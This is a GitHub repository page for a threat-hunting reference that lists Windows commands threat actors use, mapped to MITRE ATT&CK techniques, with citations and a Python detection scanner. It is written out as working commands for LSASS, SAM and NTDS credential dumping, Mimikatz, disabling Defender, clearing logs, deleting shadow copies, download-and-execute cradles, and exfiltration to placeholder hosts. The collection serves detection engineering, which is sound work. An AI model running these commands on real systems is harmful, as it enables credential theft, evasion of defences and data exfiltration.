threatactorprocedures-mitre-attack

A collection of specific commands used by threat actors, detailing their procedural implementations of tactics and techniques from the MITRE ATT&CK framework.

https://github.com/jacobstickney/threatactorprocedures-mitre-attack



Repository


Basic Info
  • Host: GitHub
  • Owner: jacobstickney
  • Default Branch: main
  • Homepage:
  • Size: 126 KB
Statistics
  • Stars: 7
  • Watchers: 1
  • Forks: 2
  • Open Issues: 0
  • Releases: 0
Topics
cmd cybersecurity detection-engineering dfir lolbins mitre-attack networksecurity powershell threat-hunting windows
Created almost 2 years ago · Last pushed about 1 year ago

README.md

ThreatActorProcedures-MITRE-ATTACK

Threat actor procedures (the “P” in TTPs) are specific implementations of the tactics and techniques outlined in the MITRE ATT&CK framework. They are the specific actions that threat actors take on a system or network after they have gained access. These actions often involve the use of command line activities.

These behaviors are specific procedural implementations of broader techniques that adversaries use to accomplish their goals. These techniques, such as System Network Configuration Discovery or Process Discovery, are linked to specific actions that illustrate how these techniques are implemented in real-world scenarios.

This is an ongoing collection of commands used by threat actors to perform various actions on a compromised system, accompanied by their respective MITRE ATT&CK technique reference numbers.


System Information Discovery [T1082]
```
systeminfo
net config workstation
tasklist /svc
ping -n 1 <remote_host>
net view
wmic product get name
wmic os caption
wmic process | find <security_product_process>
wmic volume list brief
wmic service brief
wmic product list brief
wmic baseboard list full
netsh interface firewall show all
netsh interface portproxy show all
netsh interface portproxy show v4tov4
netsh firewall show all
netsh portproxy show v4tov4
reg query hklm\software\
```

System Network Connections Discovery [T1049]

```
ipconfig /all
route print
arp -a
netstat -an
qwinsta
nslookup MACHINE_DOMAIN_NAME
```

Account Discovery: Domain Account (Active Directory) [T1087.002]

```
net accounts /domain
net user <user_name> /domain
net user Administrator /domain
nltest dclist:
nltest /domain_trusts /all_trusts
net config workstation
net groups /domain
net group "domain controllers" /domain
net group "Domain Admins" /domain
net group "domain computers" /domain
net group "enterprise admins" /dom
net localgroup "administrators" /dom
net time /domain
net share
setspn.exe -F -Q */*
dsquery group -name "<groupname>" | dsget group -members
Get-MsolUser <user>
Get-MsolUser -UserPrincipalName <user>
adfind -gcb -sc trustdmp
adfind -f "(objectcategory=group)"
adfind -subnets -f (objectCategory=subnet)
adfind -f (objectcategory=organizationalUnit)
adfind -f objectcategory=computer -csv name operatingSystem
adfind -f objectcategory=computer
adfind -f (objectcategory=person)
adexplorer -snapshot
```

Domain Trust Discovery [T1482]

```
nltest /domain_trusts
nltest /dclist:<victim_domain>
netdom trust <domain_name>
dsquery * -filter "(objectClass=trustedDomain)"
net view /domain
dsget domain <domain_name> -trus
Get-ADTrust -Filter *
Get-NetDomainTrust
Get-ADDomainController -Discover
Test-NetConnection -ComputerName <domain_controller_name>
Get-NetForestDomain
Get-ADDomain <domain_name> | Select-Object Name, Trusts
Get-ADTrustRelationship -Domain <domain_name>
```

Query Registry [T1012]

```
reg query hkcu\<domain_user_sid>\Software\Microsoft\Office\14.0\Outlook /s | find "<victim_domain_name>"
cmd /c tasklist
wmic process | find "<process_name>"
```

Remote System Discovery [T1018]

```
cmd /c wmic product get name
dir \\<ip>\c$\windows\system32\tasks
ping <domain_name>
ping <ip_address>
```

LDAP filter used for computer enumeration:

```
(&(&(&(objectClass=Computer)(dnshostname=*))(operatingsystem=*))(servicePrincipalName=*))
```

Network Share Discovery [T1135]

```
cmd.exe /C net group "domain admins" /domain
cmd.exe /C net group /d
```

Permission Groups Discovery [T1069]

```
net group "domain computers" /do
```

Domain Trust Discovery [T1482]

```
nltest /dclists
nltest /domain_trusts
nltest /dclist:<domain>
```

OS Credential Dumping: LSASS Memory [T1003.001]

```
procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\mem.dmp
cmd.exe /C tasklist /svc | findstr lsass
rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\windows\temp\lsass.dmp full
```

OS Credential Dumping: MimiKatz [T1003.001]

```
msdol.exe privilege::debug sekurlsa::logonpasswords exit
sekurlsa::Minidump lsassdump.dmp
cmd.exe /C mimikatz.exe privilege::debug sekurlsa::logonPasswords full samdump::hashes exit > "c:\pathtooutfile\<output_file>.txt"
cmd.exe powershell -ep bypass -C "import-module .\katz.ps1;Invoke-Katz" > <output_file>.txt
```

OS Credential Dumping: Security Account Manager [T1003.002]

```
reg save hklm\sam sam.hive
reg save hklm\system sys
reg save hklm\security sec
```

Process Discovery [T1057]

```
tasklist.exe /svc
powershell.exe Get-Process
```

System Network Configuration Discovery: Internet Connection Discovery [T1016]

```
ping.exe -n 1 -a <ip_address>
```

System Owner/User Discovery [T1033]

```
whoami
whoami /all
whoami /upn
quser.exe
quser
net user
net user <username>
net user /domain
net user <username> /domain
```

Steal or Forge Kerberos Tickets: Kerberoasting [T1558.003]

```
powershell.exe $Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel');
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]'');
$search.filter = '(&(servicePrincipalName=*)(objectCategory=user))';
$results = $search.Findall();
foreach ($result in $results) {
    $u = $result.GetDirectoryEntry();
    $samAccountName = $u.samAccountName;
    foreach ($s in $u.servicePrincipalName)
```

Event Triggered Execution: Image File Execution Options Injection [T1546.012]

```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<target_file>.exe" /v Debugger /d "<threat_actor_file>.<ext>"
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<target_file>.exe" /v GlobalFlag /t REG_DWORD /d <GlobalFlag_registry_entry_value>
```

Lateral Tool Transfer via SMB [T1570]

```
cmd.exe /C copy * \\<remote_ip>\C$\windows\destination\folder
```

Exfiltration Over Web Service [T1567]

```
cmd.exe /C curl -F "file=@$selfpath\<filename>.rar" --ssl-no-revoke https[:]//<web_service>.io
```

Impair Defenses: Disable or Modify Tools [T1562.001]

```
PowerShell -exec bypass -command Set-MpPreference -DisableRealtimeMonitoring $True
"$windir\$system32\WindowsPowerShell\v1.0\PowerShell.exe" Add-MpPreference -ExclusionPath "\$path\to\file.ext"
schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableArchiveScanning $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisableScanningNetworkFiles $true
Set-MpPreference -MAPSReporting
Set-MpPreference -DisableCatchupFullScan $True
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 0x2 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v "NotificationSuppress" /t REG_DWORD /d 0x1 /f
powershell.exe Uninstall-WindowsFeature -Name Windows-Defender-GUI
wmic /node:"<IP_Address>" process call create "powershell Set-MpPreference -DisableRealtimeMonitoring $true"
```

Create or Modify System Process: Windows Service [T1543.003]

```
sc <server_IP> create <service_name> <option1> <option2>
sc <server_IP> config <service_name> binpath= "<path_to_executable>"
sc <service_name> binpath= "<path_to_executable>"
```

Ingress Tool Transfer [T1105]

```
powershell.exe -exec bypass -C IEX ((New-Object Net.WebClient).downloadstring('http[:]//<url>/file.ext'))
powershell.exe -exec bypass -C IEX ((new-object net.webclient).downloadstring('http[:]//<url>/file.ext'))
powershell.exe -exec bypass -C IEX ((new-object net.tneilCbeW).daolnwoDstring('http[:]//<url>/file.ext'))
powershell.exe -exec bypass -C IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString('http[:]//<url>/file.ext'))
powershell.exe Invoke-WebRequest -Uri "https[:]//<url>/file.ext" -OutFile c:\file.ext -UseBasicParsing
powershell.exe iwr -Uri "https[:]//<url>/file.ext" -OutFile c:\<output_file>.ext -UseBasicParsing
cmd.exe /c PowerShell iwr -Uri http://<IP_address>:<port>/<file_name>.ext -OutFile c:\<output_file>.ext -UseBasicParsing
PowerShell -Command $wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.<ext>'; $wc.DownloadFile('[URL]', $tempfile); & $tempfile ; Remove-Item -Force $tempfile
powershell.exe -exec bypass -C Invoke-WebRequest "http:/<IP_address>:<port>/<file_name>.ext" -OutFile "<output_file>.ext"
powershell.exe -C wget "http[:]//<IP_address>:<port>/<file_name>.ext" -OutFile "<output_file>.ext"
cmd.exe /c certutil -urlcache -split -f hxxp[:]//<IP_address>:<port>/<file_name>.ext $path\to\outfile\<output_file>.ext
```

Indicator Removal: Clear Windows Event Logs [T1070.001]

```
wevtutil cl system
wevtutil cl security
wevtutil cl application
```

Remote Services: SMB/Windows Admin Shares [T1021.002]

```
net use \\<remote ip> "<password>" /u:<domain>\<username>
```

Scheduled Task/Job: Scheduled Task [T1053.005]

```
schtasks /s <remote_host> /tn <task_name> /u <domain>\<username> /p <password> /create /ru system /sc
schtasks /create -s <remote> /tn <task_name> /tr <path_to_executable> /sc <schedule_type> /st <start_time>
schtasks /create /ru <user> /sc <service_name> /tn <task_name>
```

Indicator Removal: Clear Persistence [T1070.009]

```
schtasks /s <remote_host> /tn one /u <domain>\<username> /p <password> /f /delete
```

OS Credential Dumping: NTDS [T1003.003]

```
wmic process call create "ntdsutil \"ac i ntds\" ifm \"create full <file_path>
wmic process call create "ntdsutil \"activate instance ntds\" ifm \"create full <file_path>
wmic process call create "cmd.exe /c ntdsutil \"ac i ntds\" ifm \"create full <file_path>
wmic process call create "cmd.exe /c mkdir <file_path> & ntdsutil \"ac i ntds\" ifm \"create full <file_path>
ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\Windows\temp\<folder>' q q
ntdsutil.exe 'activate instance ntds' 'ifm' 'create full C:\Windows\temp\<folder>' q q
```

Network Share Connection Removal [T1070.005]

```
net use * /delete /y
```

File and Directory Discovery [T1083]

```
echo list volume | diskpart
echo lis vol | diskpart
wmic /node:<IP_address> /user:"<user>" /password:"<password>" logicaldisk get caption,description,drivetype,providername,volumename
Get-CimInstance win32_logicaldisk
```

BITS Jobs [T1197]

```
cmd.exe /c bitsadmin /transfer n http[:]//<IP_address>:<port>/<file_name>.ext $public\Downloads\<output_file>.ext
powershell.exe Start-BitsTransfer -Source http[:]//<IP_address>/pathto/<file_name>.ext -Destination C:\Users\pathtofile\<output_file>.ext -transfertype download
```

System Services: Service Execution [T1569.002]

```
sc.exe \\TARGET start <service_name>
```

Credentials from Password Stores: Credentials from Web Browsers [T1555.003]

```
cmd.exe /Q /c esentutl.exe /y
```

Browser profile files targeted by the copy:

```
Google Chrome
$user\$appdata\Google\Chrome\User Data.*\Bookmarks
$user\$appdata\Google\Chrome\User Data.*\Cookies
$user\$appdata\Google\Chrome\User Data.*\Login Data
$user\$appdata\Google\Chrome\User Data.*\Web Data
$user\$appdata\Google\Chrome\User Data.*\Web Data-journal
$user\$appdata\Google\Chrome\User Data\Local State

Mozilla Firefox
$user\$appdata\Mozilla\Firefox\Profiles.*\cookies
$user\$appdata\Mozilla\Firefox\Profiles.*\key3.db
$user\$appdata\Mozilla\Firefox\Profiles.*\key4.db
$user\$appdata\Mozilla\Firefox\Profiles.*\logins.json
$user\$appdata\Mozilla\Firefox\Profiles.*\places.sqlite

Opera
$user\$appdata\Opera Software\Opera Stable\User Data.*\Bookmarks
$user\$appdata\Opera Software\Opera Stable\User Data.*\Cookies
$user\$appdata\Opera Software\Opera Stable\User Data.*\Login Data
$user\$appdata\Opera Software\Opera Stable\User Data.*\Web Data
$user\$appdata\Opera Software\Opera Stable\User Data\Local State
$user\$appdata\Opera\Opera Next\User Data.*\Bookmarks
$user\$appdata\Opera\Opera Next\User Data.*\Cookies
$user\$appdata\Opera\Opera Next\User Data.*\Login Data
$user\$appdata\Opera\Opera Next\User Data.*\Web Data
$user\$appdata\Opera\Opera Next\User Data\Local State

Microsoft Edge
$user\$appdata\Microsoft\Edge\User Data.*\Bookmarks
$user\$appdata\Microsoft\Edge\User Data.*\Cookies
$user\$appdata\Microsoft\Edge\User Data.*\Login Data
$user\$appdata\Microsoft\Edge\User Data.*\Web Data
$user\$appdata\Microsoft\Edge\User Data\Local State
```

Windows Management Instrumentation [T1047]

```
gwmi
Get-WmiObject -Query "select * from Win32_Service"
Get-WmiObject -Class Win32_Service
Get-CimInstance -ClassName Win32_ComputerSystem
Get-WmiObject win32_processor
Get-WmiObject CIM_PhysicalMemory
Get-WmiObject -ComputerName <host> -Class Win32_ComputerSystem | Select-Object UserName
wmic.exe os get /FORMAT:"http://<IP_address>:<port>/<file_name>.exe"
```

Device Driver Discovery [T1652]

```
powershell.exe Get-SystemDriver
```

System Service Discovery [T1007]

```
powershell.exe gsv
powershell.exe Get-Service
powershell.exe Get-CimInstance -ClassName Win32_Service
sc query <service_name>
```

Use Alternate Authentication Material: Pass the Hash [T1550.002]

```
<mimikatz>.exe "privilege::debug" "sekurlsa::logonpasswords" exit > <output_file>.txt
<mimikatz>.exe "privilege::debug" "sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>" exit
```

* File name is often changed

Log Enumeration [T1654]

```
powershell.exe get-eventlog security
powershell.exe -c "get-eventlog 'Security'"
```

Exfiltration Over Web Service: Exfiltration to Cloud Storage [T1567.002]

```
powershell.exe InvokeModule -module awscollector -awskey <key_value> -awssecret <aws_secret> -awss3bucket <domain> -awsregion <region> -handleSystems <target_host>
rclone.exe copy "\\SERVER.domain.name\path"
```

Inter-Process Communication [T1559]

```
\postex_*
\postex_ssh_*
\status_*
\msagent_*
\MSSE-*
\*-server
\wkssvc*
\DserNamePipe*
\mojo.*
\spoolss_*
\srvsvc_*
\win_svc*
\ntsvcs*
\winsock
\UIA_PIPE
```

* Cobalt Strike named pipes

Create Account: Local Account [T1136.001]

```
net user sys <username> /add
net localgroup %AdmGroup% sys /add
```

Remote Services: Remote Desktop Protocol [T1021.001]

```
net localgroup "%RDPGroup%" sys /add
netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
```

Inhibit System Recovery [T1490]

```
wmic shadowcopy delete
powershell.exe -Command Get-WmiObject Win32_Shadowcopy | Remove-WmiObject
vssadmin delete shadows /all /quiet
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
```

Software Discovery: Security Software Discovery [T1518.001]

```
wmic /Node:localhost /Namespace:\\remotepath Path AntiVirusProduct Get * /Format:List
sc query WinDefend
Get-MpComputerStatus
```

Modify System Image [T1601]

```
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<vulnerable_service_name>" /v ImagePath /t REG_SZ /d "C:\pathto\<payload.ext>"
reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\<vulnerable_service_name>" /v ImagePath /t REG_SZ /d "C:\pathto\<payload.ext>"
reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\<vulnerable_service_name>" /v ImagePath /t REG_SZ /d "C:\pathto\<payload.ext>"
```

Impair Defenses: Disable or Modify System Firewall [T1562.004]

```
netsh advfirewall set currentprofile state off
netsh interface portproxy add v4tov4 listenaddress=<ip_address> listenport=<listening_port> connectaddress=<internal_ip_address> connectport=<connect_port> protocol=tcp
netsh advfirewall firewall add rule dir=in name="<name>" program=<file_path> service=rpcss action=allow protocol=TCP localport=<port>
```

Obfuscated Files or Information [T1027]

```
powerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand <Base64_encoded_string>
```

System Binary Proxy Execution: Rundll32 [T1218.011]

```
rundll32 comsvcs.dll,MiniDump <PID> <file_name>.bin full
```

System Binary Proxy Execution: Mshta [T1218.005]

```
mshta.exe vbscript:(CreateObject("WScript.Shell").Run("<file_name>.exe",0))(Window.Close)
mshta.exe http[:]//<IP_address>/<file_name>.hta
```
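A detection-side example added here, not part of the repository: a small Python scanner that turns several of the procedures catalogued above into case-insensitive regexes, runs them over constructed process-creation records, and labels each hit with the ATT&CK technique ID used in this README. The `host|user|commandline` record format, the rule patterns and the sample lines are all assumptions.

```python
import re

# Detection rules derived from the procedures catalogued above; each entry is
# (ATT&CK ID, label, regex applied case-insensitively to the command line).
RULES = [
    ("T1003.001", "LSASS dump via comsvcs MiniDump", r"comsvcs\.dll\s*,\s*minidump"),
    ("T1003.001", "LSASS dump via procdump", r"procdump.*-ma\s+lsass"),
    ("T1003.002", "SAM/SYSTEM/SECURITY hive export",
     r"reg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b"),
    ("T1003.003", "NTDS extraction via ntdsutil IFM", r"ntdsutil.*\bifm\b.*create\s+full"),
    ("T1070.001", "Event log clearing", r"wevtutil(\.exe)?\s+cl\s+"),
    ("T1490", "Shadow copy deletion / recovery tampering",
     r"(vssadmin.*delete\s+shadows|wmic\s+shadowcopy\s+delete|bcdedit.*recoveryenabled\s+no)"),
    ("T1562.001", "Defender tampering via Set-MpPreference or policy registry",
     r"(set-mppreference\s+-disable|disableantispyware|disablerealtimemonitoring)"),
    ("T1546.012", "IFEO Debugger persistence", r"image file execution options.*\s/v\s+debugger"),
    ("T1105", "Ingress tool transfer via LOLBin",
     r"(certutil.*-urlcache|bitsadmin\s+/transfer|downloadstring\(|invoke-webrequest|\biwr\b)"),
    ("T1218.005", "Mshta proxy execution", r"mshta(\.exe)?\s+(vbscript:|https?)"),
]
COMPILED = [(tid, label, re.compile(rx, re.IGNORECASE)) for tid, label, rx in RULES]


def classify(cmdline):
    """Return the list of (technique_id, label) rules matching one command line."""
    return [(tid, label) for tid, label, rx in COMPILED if rx.search(cmdline)]


def scan(lines):
    """Scan 'host|user|commandline' records; return hits grouped by technique ID."""
    hits = {}
    for line in lines:
        # maxsplit=2 keeps any '|' inside the command line (e.g. a pipeline) intact
        host, user, cmd = line.split("|", 2)
        for tid, label in classify(cmd):
            hits.setdefault(tid, []).append((host, user, label, cmd))
    return hits


# Constructed sample records (not real telemetry), pipe-separated.
SAMPLE_LOG = [
    "WS01|corp\\jdoe|rundll32.exe c:\\Windows\\System32\\comsvcs.dll, MiniDump 624 C:\\windows\\temp\\lsass.dmp full",
    "WS01|corp\\jdoe|wevtutil cl security",
    "DC01|corp\\svc_backup|ntdsutil.exe \"ac i ntds\" ifm \"create full C:\\Windows\\temp\\x\" q q",
    "WS02|corp\\admin|vssadmin delete shadows /all /quiet",
    "WS02|corp\\admin|PowerShell -exec bypass -command Set-MpPreference -DisableRealtimeMonitoring $True",
    "WS03|corp\\bob|certutil -urlcache -split -f http://10.0.0.5:8080/a.ext C:\\Users\\Public\\a.ext",
    "WS03|corp\\bob|notepad.exe C:\\Users\\bob\\notes.txt",
]

if __name__ == "__main__":
    for tid, events in sorted(scan(SAMPLE_LOG).items()):
        for host, user, label, cmd in events:
            print(f"{tid} {label}: {host} {user} :: {cmd}")
```

Patterns this loose will fire on legitimate administration (backup software running ntdsutil, help-desk scripts clearing logs), so in practice each hit is scored against the executing account and parent process rather than alerted on directly.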

Owner

  • Login: jacobstickney
  • Kind: user

Citation (CITATION.cff)

Kaspersky. (2023). Modern Asian APT Groups: Tactics, Techniques and Procedures.
Microsoft Learn. Technical documentation. https://learn.microsoft.com/en-us/docs
The DFIR Report. (2024, April 29). https://thedfirreport.com/
Penetration Testing Lab. (2020, January 22). ImagePath. https://pentestlab.blog/tag/imagepath/
CISA. (2024, April 18). #StopRansomware: Akira Ransomware. https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a
CISA. (2024, February 29). #StopRansomware: Phobos Ransomware. https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a
MaNikhilHo. (2023, October 5). Everybody LOLs, sometimes. Medium. https://medium.com/@realnikhiljyapu/everybody-lols-sometimes-1a5e4a49e898
Reaves, J. (2021, September 2). Sarwent malware continues to evolve with updated command functions. SentinelLabs. https://www.sentinelone.com/labs/sarwent-malware-continues-to-evolve-with-updated-command-functions/
Black Hills Information Security. (2024, February 8). Domain Goodness – How I learned to LOVE AD Explorer. https://www.blackhillsinfosec.com/domain-goodness-learned-love-ad-explorer/
CrowdStrike. (2023). 8 LOLBins Every Threat Hunter Should Know.
CrowdStrike. (2023). CrowdStrike 2023 Threat Hunting Report.
Splunk. (2024, April 17). Detecting & Hunting Named Pipes: A Splunk Tutorial. https://www.splunk.com/en_us/blog/security/named-pipe-threats.html
